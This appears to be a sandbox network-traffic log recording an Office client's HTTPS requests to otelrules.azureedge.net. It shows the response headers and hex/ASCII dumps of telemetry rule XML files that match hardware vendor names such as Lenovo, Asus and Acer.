2024-10-31 18:20:02 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	51264	13.107.246.45	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:02 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:02 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: d6813257-101e-0034-034f-2896ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182002Z-15b8d89586fmhkw429ba5n22m80000000bcg00000000c7rg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:02 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	51261	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:02 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:02 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:02 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 633f9008-101e-00a2-3e9b-279f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182002Z-16849878b78j7llf5vkyvvcehs0000000b0g00000000ag9h x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:02 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	51266	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:03 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:03 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:03 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 3c9c0adf-d01e-0028-0c96-257896000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182003Z-16849878b786fl7gm2qg4r5y700000000a6000000000cvy5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:03 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.4	51270	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:03 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:03 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:03 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: d7faccb9-c01e-002b-307f-276e00000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182003Z-16849878b78tg5n42kspfr0x4800000009u000000000wp1x x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:03 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.4	51268	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:03 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:03 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:03 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: fcb0891e-801e-007b-6669-28e7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182003Z-15b8d89586flspj6y6m5fk442w0000000fyg0000000041c2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:03 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.4	51267	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:03 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:03 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:03 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 9b80997a-f01e-0003-4c76-2a4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182003Z-159b85dff8fj6b6xhC1DFW8qdg00000001u00000000058a5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:03 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	51269	13.107.246.45	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:03 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:03 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:03 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182003Z-16849878b78qf2gleqhwczd21s00000009yg0000000113en x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:03 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	51273	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:04 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:04 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 78a5d0bc-501e-005b-6da6-26d7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182004Z-16849878b787bfsh7zgp804my400000008sg000000003mbb x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	51275	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:04 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:05 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:04 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 6a0b02b6-001e-0046-12c7-2ada4b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182004Z-159b85dff8fdjprfhC1DFWuqh000000000tg0000000081y0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	51271	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:04 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:05 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:04 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 89d7e9f4-d01e-0066-46a8-2aea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182004Z-16849878b78qf2gleqhwczd21s0000000a1000000000r8u3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.4	51272	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:04 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:04 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 9a09e836-e01e-0052-3cae-26d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182004Z-16849878b78p8hrf1se7fucxk80000000apg00000000vbr9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	51274	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:04 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
